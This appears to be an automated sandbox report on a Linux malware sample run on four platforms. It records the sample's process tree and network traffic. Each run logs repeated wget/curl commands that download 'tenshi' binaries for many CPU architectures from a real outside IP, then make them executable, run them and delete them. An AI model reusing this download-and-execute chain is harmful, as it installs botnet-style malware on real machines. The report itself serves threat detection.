Malware Analysis Report

2024-10-16 06:21

Sample ID 240708-ddaxrsygkq
Target 296a3c4f0b173217c609be610594274f.bin
SHA256 61fbf36df390dc9c79812fd86bf3c4efbc37533bc19b559c6379c615eba0d09b
Tags
antivm
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

61fbf36df390dc9c79812fd86bf3c4efbc37533bc19b559c6379c615eba0d09b

Threat Level: Shows suspicious behavior

The file 296a3c4f0b173217c609be610594274f.bin was found to show suspicious behavior.

Malicious Activity Summary

antivm

Executes dropped EXE

Checks CPU configuration

Writes file to tmp directory

Reads runtime system information

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-08 02:53

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-08 02:53

Reported

2024-07-08 03:06

Platform

ubuntu1804-amd64-20240508-en

Max time kernel

2s

Max time network

132s

Command Line

[/tmp/296a3c4f0b173217c609be610594274f.bin]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/tenshimips /tmp/tenshimips N/A
N/A /tmp/tenshimipsel /tmp/tenshimipsel N/A
N/A /tmp/tenshish4 /tmp/tenshish4 N/A
N/A /tmp/tenshix86 /tmp/tenshix86 N/A
N/A /tmp/tenshiarm6 /tmp/tenshiarm6 N/A
N/A /tmp/tenshii686 /tmp/tenshii686 N/A
N/A /tmp/tenshippc /tmp/tenshippc N/A
N/A /tmp/tenshii586 /tmp/tenshii586 N/A
N/A /tmp/tenshim68k /tmp/tenshim68k N/A
N/A /tmp/tenshish /tmp/tenshish N/A
N/A /tmp/tenshifuck /tmp/tenshifuck N/A
N/A /tmp/tenshiapache2 /tmp/tenshiapache2 N/A
N/A /tmp/tenshitelnetd /tmp/tenshitelnetd N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/tenshish /usr/bin/curl N/A
File opened for modification /tmp/tenshimipsel /usr/bin/curl N/A
File opened for modification /tmp/tenshish4 /usr/bin/curl N/A
File opened for modification /tmp/tenshitelnetd /usr/bin/curl N/A
File opened for modification /tmp/tenshiarm6 /usr/bin/curl N/A
File opened for modification /tmp/tenshii686 /usr/bin/curl N/A
File opened for modification /tmp/tenshii586 /usr/bin/curl N/A
File opened for modification /tmp/tenshim68k /usr/bin/curl N/A
File opened for modification /tmp/tenshifuck /usr/bin/curl N/A
File opened for modification /tmp/tenshix86 /usr/bin/curl N/A
File opened for modification /tmp/tenshippc /usr/bin/curl N/A
File opened for modification /tmp/tenshimips /usr/bin/curl N/A
File opened for modification /tmp/tenshiapache2 /usr/bin/curl N/A

Processes

/tmp/296a3c4f0b173217c609be610594274f.bin

[/tmp/296a3c4f0b173217c609be610594274f.bin]

/usr/bin/wget

[wget http://157.230.117.251/tenshimips]

/usr/bin/curl

[curl -O http://157.230.117.251/tenshimips]

/bin/chmod

[chmod +x tenshimips]

/tmp/tenshimips

[./tenshimips]

/bin/rm

[rm -rf tenshimips]

/usr/bin/wget

[wget http://157.230.117.251/tenshimipsel]

/usr/bin/curl

[curl -O http://157.230.117.251/tenshimipsel]

/bin/chmod

[chmod +x tenshimipsel]

/tmp/tenshimipsel

[./tenshimipsel]

/bin/rm

[rm -rf tenshimipsel]

/usr/bin/wget

[wget http://157.230.117.251/tenshish4]

/usr/bin/curl

[curl -O http://157.230.117.251/tenshish4]

/bin/chmod

[chmod +x tenshish4]

/tmp/tenshish4

[./tenshish4]

/bin/rm

[rm -rf tenshish4]

/usr/bin/wget

[wget http://157.230.117.251/tenshix86]

/usr/bin/curl

[curl -O http://157.230.117.251/tenshix86]

/bin/chmod

[chmod +x tenshix86]

/tmp/tenshix86

[./tenshix86]

/bin/rm

[rm -rf tenshix86]

/usr/bin/wget

[wget http://157.230.117.251/tenshiarm6]

/usr/bin/curl

[curl -O http://157.230.117.251/tenshiarm6]

/bin/chmod

[chmod +x tenshiarm6]

/tmp/tenshiarm6

[./tenshiarm6]

/bin/rm

[rm -rf tenshiarm6]

/usr/bin/wget

[wget http://157.230.117.251/tenshii686]

/usr/bin/curl

[curl -O http://157.230.117.251/tenshii686]

/bin/chmod

[chmod +x tenshii686]

/tmp/tenshii686

[./tenshii686]

/bin/rm

[rm -rf tenshii686]

/usr/bin/wget

[wget http://157.230.117.251/tenshippc]

/usr/bin/curl

[curl -O http://157.230.117.251/tenshippc]

/bin/chmod

[chmod +x tenshippc]

/tmp/tenshippc

[./tenshippc]

/bin/rm

[rm -rf tenshippc]

/usr/bin/wget

[wget http://157.230.117.251/tenshii586]

/usr/bin/curl

[curl -O http://157.230.117.251/tenshii586]

/bin/chmod

[chmod +x tenshii586]

/tmp/tenshii586

[./tenshii586]

/bin/rm

[rm -rf tenshii586]

/usr/bin/wget

[wget http://157.230.117.251/tenshim68k]

/usr/bin/curl

[curl -O http://157.230.117.251/tenshim68k]

/bin/chmod

[chmod +x tenshim68k]

/tmp/tenshim68k

[./tenshim68k]

/bin/rm

[rm -rf tenshim68k]

/usr/bin/wget

[wget http://157.230.117.251/tenshish]

/usr/bin/curl

[curl -O http://157.230.117.251/tenshish]

/bin/chmod

[chmod +x tenshish]

/tmp/tenshish

[./tenshish]

/bin/rm

[rm -rf tenshish]

/usr/bin/wget

[wget http://157.230.117.251/tenshifuck]

/usr/bin/curl

[curl -O http://157.230.117.251/tenshifuck]

/bin/chmod

[chmod +x tenshifuck]

/tmp/tenshifuck

[./tenshifuck]

/bin/rm

[rm -rf tenshifuck]

/usr/bin/wget

[wget http://157.230.117.251/tenshiapache2]

/usr/bin/curl

[curl -O http://157.230.117.251/tenshiapache2]

/bin/chmod

[chmod +x tenshiapache2]

/tmp/tenshiapache2

[./tenshiapache2]

/bin/rm

[rm -rf tenshiapache2]

/usr/bin/wget

[wget http://157.230.117.251/tenshitelnetd]

/usr/bin/curl

[curl -O http://157.230.117.251/tenshitelnetd]

/bin/chmod

[chmod +x tenshitelnetd]

/tmp/tenshitelnetd

[./tenshitelnetd]

/bin/rm

[rm -rf tenshitelnetd]

Network

Country Destination Domain Proto
US 151.101.193.91:443 tcp
GB 185.125.188.61:443 tcp
GB 185.125.188.61:443 tcp
US 1.1.1.1:53 ocp-ingress.fastly.gnome.org udp
US 151.101.193.91:443 tcp
GB 89.187.167.3:443 tcp
N/A 224.0.0.251:5353 udp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp

Files

/tmp/tenshimips

MD5 01e9b3351a20632ce2de4a219637711c
SHA1 d46e0281e15a1ef4fec829351c47c0eacaf6ad5c
SHA256 b99af4f05341cc3630e61fd747d5eb37d45dcf39253f67919a6a1e4bde92f3c2
SHA512 33eba632764a2d267bede9278c55e26aac5653873a3b73943ce4a77bef6aa6395bd8fa334d5e3d65c4998fea1b049ffc47ac20c7e6898ec98309f1c45a96220f

Analysis: behavioral2

Detonation Overview

Submitted

2024-07-08 02:53

Reported

2024-07-08 03:07

Platform

debian9-armhf-20240611-en

Max time kernel

11s

Max time network

14s

Command Line

[/tmp/296a3c4f0b173217c609be610594274f.bin]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/tenshimips /tmp/tenshimips N/A
N/A /tmp/tenshimipsel /tmp/tenshimipsel N/A
N/A /tmp/tenshish4 /tmp/tenshish4 N/A
N/A /tmp/tenshix86 /tmp/tenshix86 N/A
N/A /tmp/tenshiarm6 /tmp/tenshiarm6 N/A
N/A /tmp/tenshii686 /tmp/tenshii686 N/A
N/A /tmp/tenshippc /tmp/tenshippc N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/tenshimipsel /usr/bin/curl N/A
File opened for modification /tmp/tenshish4 /usr/bin/curl N/A
File opened for modification /tmp/tenshix86 /usr/bin/curl N/A
File opened for modification /tmp/tenshiarm6 /usr/bin/curl N/A
File opened for modification /tmp/tenshii686 /usr/bin/curl N/A
File opened for modification /tmp/tenshippc /usr/bin/curl N/A
File opened for modification /tmp/tenshimips /usr/bin/curl N/A

Processes

/tmp/296a3c4f0b173217c609be610594274f.bin

[/tmp/296a3c4f0b173217c609be610594274f.bin]

/usr/bin/wget

[wget http://157.230.117.251/tenshimips]

/usr/bin/curl

[curl -O http://157.230.117.251/tenshimips]

/bin/chmod

[chmod +x tenshimips]

/tmp/tenshimips

[./tenshimips]

/bin/rm

[rm -rf tenshimips]

/usr/bin/wget

[wget http://157.230.117.251/tenshimipsel]

/usr/bin/curl

[curl -O http://157.230.117.251/tenshimipsel]

/bin/chmod

[chmod +x tenshimipsel]

/tmp/tenshimipsel

[./tenshimipsel]

/bin/rm

[rm -rf tenshimipsel]

/usr/bin/wget

[wget http://157.230.117.251/tenshish4]

/usr/bin/curl

[curl -O http://157.230.117.251/tenshish4]

/bin/chmod

[chmod +x tenshish4]

/tmp/tenshish4

[./tenshish4]

/bin/rm

[rm -rf tenshish4]

/usr/bin/wget

[wget http://157.230.117.251/tenshix86]

/usr/bin/curl

[curl -O http://157.230.117.251/tenshix86]

/bin/chmod

[chmod +x tenshix86]

/tmp/tenshix86

[./tenshix86]

/bin/rm

[rm -rf tenshix86]

/usr/bin/wget

[wget http://157.230.117.251/tenshiarm6]

/usr/bin/curl

[curl -O http://157.230.117.251/tenshiarm6]

/bin/chmod

[chmod +x tenshiarm6]

/tmp/tenshiarm6

[./tenshiarm6]

/bin/rm

[rm -rf tenshiarm6]

/usr/bin/wget

[wget http://157.230.117.251/tenshii686]

/usr/bin/curl

[curl -O http://157.230.117.251/tenshii686]

/bin/chmod

[chmod +x tenshii686]

/tmp/tenshii686

[./tenshii686]

/bin/rm

[rm -rf tenshii686]

/usr/bin/wget

[wget http://157.230.117.251/tenshippc]

/usr/bin/curl

[curl -O http://157.230.117.251/tenshippc]

/bin/chmod

[chmod +x tenshippc]

/tmp/tenshippc

[./tenshippc]

/bin/rm

[rm -rf tenshippc]

/usr/bin/wget

[wget http://157.230.117.251/tenshii586]

Network

Country Destination Domain Proto
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp

Files

/tmp/tenshimips

MD5 01e9b3351a20632ce2de4a219637711c
SHA1 d46e0281e15a1ef4fec829351c47c0eacaf6ad5c
SHA256 b99af4f05341cc3630e61fd747d5eb37d45dcf39253f67919a6a1e4bde92f3c2
SHA512 33eba632764a2d267bede9278c55e26aac5653873a3b73943ce4a77bef6aa6395bd8fa334d5e3d65c4998fea1b049ffc47ac20c7e6898ec98309f1c45a96220f

Analysis: behavioral3

Detonation Overview

Submitted

2024-07-08 02:53

Reported

2024-07-08 03:07

Platform

debian9-mipsbe-20240611-en

Max time kernel

123s

Max time network

154s

Command Line

[/tmp/296a3c4f0b173217c609be610594274f.bin]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/tenshimips /tmp/tenshimips N/A
N/A /tmp/tenshimipsel /tmp/tenshimipsel N/A
N/A /tmp/tenshish4 /tmp/tenshish4 N/A
N/A /tmp/tenshix86 /tmp/tenshix86 N/A
N/A /tmp/tenshiarm6 /tmp/tenshiarm6 N/A
N/A /tmp/tenshii686 /tmp/tenshii686 N/A
N/A /tmp/tenshippc /tmp/tenshippc N/A
N/A /tmp/tenshii586 /tmp/tenshii586 N/A
N/A /tmp/tenshim68k /tmp/tenshim68k N/A
N/A /tmp/tenshish /tmp/tenshish N/A
N/A /tmp/tenshifuck /tmp/tenshifuck N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/tenshimipsel /usr/bin/curl N/A
File opened for modification /tmp/tenshix86 /usr/bin/curl N/A
File opened for modification /tmp/tenshiarm6 /usr/bin/curl N/A
File opened for modification /tmp/tenshii686 /usr/bin/curl N/A
File opened for modification /tmp/tenshii586 /usr/bin/curl N/A
File opened for modification /tmp/tenshish /usr/bin/curl N/A
File opened for modification /tmp/tenshifuck /usr/bin/curl N/A
File opened for modification /tmp/tenshimips /usr/bin/curl N/A
File opened for modification /tmp/tenshippc /usr/bin/curl N/A
File opened for modification /tmp/tenshim68k /usr/bin/curl N/A
File opened for modification /tmp/tenshish4 /usr/bin/curl N/A

Processes

/tmp/296a3c4f0b173217c609be610594274f.bin

[/tmp/296a3c4f0b173217c609be610594274f.bin]

/usr/bin/wget

[wget http://157.230.117.251/tenshimips]

/usr/bin/curl

[curl -O http://157.230.117.251/tenshimips]

/bin/chmod

[chmod +x tenshimips]

/tmp/tenshimips

[./tenshimips]

/bin/rm

[rm -rf tenshimips]

/usr/bin/wget

[wget http://157.230.117.251/tenshimipsel]

/usr/bin/curl

[curl -O http://157.230.117.251/tenshimipsel]

/bin/chmod

[chmod +x tenshimipsel]

/tmp/tenshimipsel

[./tenshimipsel]

/bin/rm

[rm -rf tenshimipsel]

/usr/bin/wget

[wget http://157.230.117.251/tenshish4]

/usr/bin/curl

[curl -O http://157.230.117.251/tenshish4]

/bin/chmod

[chmod +x tenshish4]

/tmp/tenshish4

[./tenshish4]

/bin/rm

[rm -rf tenshish4]

/usr/bin/wget

[wget http://157.230.117.251/tenshix86]

/usr/bin/curl

[curl -O http://157.230.117.251/tenshix86]

/bin/chmod

[chmod +x tenshix86]

/tmp/tenshix86

[./tenshix86]

/bin/rm

[rm -rf tenshix86]

/usr/bin/wget

[wget http://157.230.117.251/tenshiarm6]

/usr/bin/curl

[curl -O http://157.230.117.251/tenshiarm6]

/bin/chmod

[chmod +x tenshiarm6]

/tmp/tenshiarm6

[./tenshiarm6]

/bin/rm

[rm -rf tenshiarm6]

/usr/bin/wget

[wget http://157.230.117.251/tenshii686]

/usr/bin/curl

[curl -O http://157.230.117.251/tenshii686]

/bin/chmod

[chmod +x tenshii686]

/tmp/tenshii686

[./tenshii686]

/bin/rm

[rm -rf tenshii686]

/usr/bin/wget

[wget http://157.230.117.251/tenshippc]

/usr/bin/curl

[curl -O http://157.230.117.251/tenshippc]

/bin/chmod

[chmod +x tenshippc]

/tmp/tenshippc

[./tenshippc]

/bin/rm

[rm -rf tenshippc]

/usr/bin/wget

[wget http://157.230.117.251/tenshii586]

/usr/bin/curl

[curl -O http://157.230.117.251/tenshii586]

/bin/chmod

[chmod +x tenshii586]

/tmp/tenshii586

[./tenshii586]

/bin/rm

[rm -rf tenshii586]

/usr/bin/wget

[wget http://157.230.117.251/tenshim68k]

/usr/bin/curl

[curl -O http://157.230.117.251/tenshim68k]

/bin/chmod

[chmod +x tenshim68k]

/tmp/tenshim68k

[./tenshim68k]

/bin/rm

[rm -rf tenshim68k]

/usr/bin/wget

[wget http://157.230.117.251/tenshish]

/usr/bin/curl

[curl -O http://157.230.117.251/tenshish]

/bin/chmod

[chmod +x tenshish]

/tmp/tenshish

[./tenshish]

/bin/rm

[rm -rf tenshish]

/usr/bin/wget

[wget http://157.230.117.251/tenshifuck]

/usr/bin/curl

[curl -O http://157.230.117.251/tenshifuck]

/bin/chmod

[chmod +x tenshifuck]

/tmp/tenshifuck

[./tenshifuck]

/bin/rm

[rm -rf tenshifuck]

/usr/bin/wget

[wget http://157.230.117.251/tenshiapache2]

/usr/bin/curl

[curl -O http://157.230.117.251/tenshiapache2]

Network

Country Destination Domain Proto
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 tcp

Files

/tmp/tenshimips

MD5 01e9b3351a20632ce2de4a219637711c
SHA1 d46e0281e15a1ef4fec829351c47c0eacaf6ad5c
SHA256 b99af4f05341cc3630e61fd747d5eb37d45dcf39253f67919a6a1e4bde92f3c2
SHA512 33eba632764a2d267bede9278c55e26aac5653873a3b73943ce4a77bef6aa6395bd8fa334d5e3d65c4998fea1b049ffc47ac20c7e6898ec98309f1c45a96220f

Analysis: behavioral4

Detonation Overview

Submitted

2024-07-08 02:53

Reported

2024-07-08 03:08

Platform

debian9-mipsel-20240226-en

Max time kernel

111s

Max time network

117s

Command Line

[/tmp/296a3c4f0b173217c609be610594274f.bin]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/tenshimips /tmp/tenshimips N/A
N/A /tmp/tenshimipsel /tmp/tenshimipsel N/A
N/A /tmp/tenshish4 /tmp/tenshish4 N/A
N/A /tmp/tenshix86 /tmp/tenshix86 N/A
N/A /tmp/tenshiarm6 /tmp/tenshiarm6 N/A
N/A /tmp/tenshii686 /tmp/tenshii686 N/A
N/A /tmp/tenshippc /tmp/tenshippc N/A
N/A /tmp/tenshii586 /tmp/tenshii586 N/A
N/A /tmp/tenshim68k /tmp/tenshim68k N/A
N/A /tmp/tenshish /tmp/tenshish N/A
N/A /tmp/tenshifuck /tmp/tenshifuck N/A
N/A /tmp/tenshiapache2 /tmp/tenshiapache2 N/A
N/A /tmp/tenshitelnetd /tmp/tenshitelnetd N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/tenshish4 /usr/bin/curl N/A
File opened for modification /tmp/tenshiarm6 /usr/bin/curl N/A
File opened for modification /tmp/tenshii586 /usr/bin/curl N/A
File opened for modification /tmp/tenshish /usr/bin/curl N/A
File opened for modification /tmp/tenshimips /usr/bin/curl N/A
File opened for modification /tmp/tenshim68k /usr/bin/curl N/A
File opened for modification /tmp/tenshifuck /usr/bin/curl N/A
File opened for modification /tmp/tenshitelnetd /usr/bin/curl N/A
File opened for modification /tmp/tenshix86 /usr/bin/curl N/A
File opened for modification /tmp/tenshii686 /usr/bin/curl N/A
File opened for modification /tmp/tenshimipsel /usr/bin/curl N/A
File opened for modification /tmp/tenshippc /usr/bin/curl N/A
File opened for modification /tmp/tenshiapache2 /usr/bin/curl N/A

Processes

/tmp/296a3c4f0b173217c609be610594274f.bin

[/tmp/296a3c4f0b173217c609be610594274f.bin]

/usr/bin/wget

[wget http://157.230.117.251/tenshimips]

/usr/bin/curl

[curl -O http://157.230.117.251/tenshimips]

/bin/chmod

[chmod +x tenshimips]

/tmp/tenshimips

[./tenshimips]

/bin/rm

[rm -rf tenshimips]

/usr/bin/wget

[wget http://157.230.117.251/tenshimipsel]

/usr/bin/curl

[curl -O http://157.230.117.251/tenshimipsel]

/bin/chmod

[chmod +x tenshimipsel]

/tmp/tenshimipsel

[./tenshimipsel]

/bin/rm

[rm -rf tenshimipsel]

/usr/bin/wget

[wget http://157.230.117.251/tenshish4]

/usr/bin/curl

[curl -O http://157.230.117.251/tenshish4]

/bin/chmod

[chmod +x tenshish4]

/tmp/tenshish4

[./tenshish4]

/bin/rm

[rm -rf tenshish4]

/usr/bin/wget

[wget http://157.230.117.251/tenshix86]

/usr/bin/curl

[curl -O http://157.230.117.251/tenshix86]

/bin/chmod

[chmod +x tenshix86]

/tmp/tenshix86

[./tenshix86]

/bin/rm

[rm -rf tenshix86]

/usr/bin/wget

[wget http://157.230.117.251/tenshiarm6]

/usr/bin/curl

[curl -O http://157.230.117.251/tenshiarm6]

/bin/chmod

[chmod +x tenshiarm6]

/tmp/tenshiarm6

[./tenshiarm6]

/bin/rm

[rm -rf tenshiarm6]

/usr/bin/wget

[wget http://157.230.117.251/tenshii686]

/usr/bin/curl

[curl -O http://157.230.117.251/tenshii686]

/bin/chmod

[chmod +x tenshii686]

/tmp/tenshii686

[./tenshii686]

/bin/rm

[rm -rf tenshii686]

/usr/bin/wget

[wget http://157.230.117.251/tenshippc]

/usr/bin/curl

[curl -O http://157.230.117.251/tenshippc]

/bin/chmod

[chmod +x tenshippc]

/tmp/tenshippc

[./tenshippc]

/bin/rm

[rm -rf tenshippc]

/usr/bin/wget

[wget http://157.230.117.251/tenshii586]

/usr/bin/curl

[curl -O http://157.230.117.251/tenshii586]

/bin/chmod

[chmod +x tenshii586]

/tmp/tenshii586

[./tenshii586]

/bin/rm

[rm -rf tenshii586]

/usr/bin/wget

[wget http://157.230.117.251/tenshim68k]

/usr/bin/curl

[curl -O http://157.230.117.251/tenshim68k]

/bin/chmod

[chmod +x tenshim68k]

/tmp/tenshim68k

[./tenshim68k]

/bin/rm

[rm -rf tenshim68k]

/usr/bin/wget

[wget http://157.230.117.251/tenshish]

/usr/bin/curl

[curl -O http://157.230.117.251/tenshish]

/bin/chmod

[chmod +x tenshish]

/tmp/tenshish

[./tenshish]

/bin/rm

[rm -rf tenshish]

/usr/bin/wget

[wget http://157.230.117.251/tenshifuck]

/usr/bin/curl

[curl -O http://157.230.117.251/tenshifuck]

/bin/chmod

[chmod +x tenshifuck]

/tmp/tenshifuck

[./tenshifuck]

/bin/rm

[rm -rf tenshifuck]

/usr/bin/wget

[wget http://157.230.117.251/tenshiapache2]

/usr/bin/curl

[curl -O http://157.230.117.251/tenshiapache2]

/bin/chmod

[chmod +x tenshiapache2]

/tmp/tenshiapache2

[./tenshiapache2]

/bin/rm

[rm -rf tenshiapache2]

/usr/bin/wget

[wget http://157.230.117.251/tenshitelnetd]

/usr/bin/curl

[curl -O http://157.230.117.251/tenshitelnetd]

/bin/chmod

[chmod +x tenshitelnetd]

/tmp/tenshitelnetd

[./tenshitelnetd]

/bin/rm

[rm -rf tenshitelnetd]

Network

Country Destination Domain Proto
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp
DE 157.230.117.251:80 157.230.117.251 tcp

Files

/tmp/tenshimips

MD5 01e9b3351a20632ce2de4a219637711c
SHA1 d46e0281e15a1ef4fec829351c47c0eacaf6ad5c
SHA256 b99af4f05341cc3630e61fd747d5eb37d45dcf39253f67919a6a1e4bde92f3c2
SHA512 33eba632764a2d267bede9278c55e26aac5653873a3b73943ce4a77bef6aa6395bd8fa334d5e3d65c4998fea1b049ffc47ac20c7e6898ec98309f1c45a96220f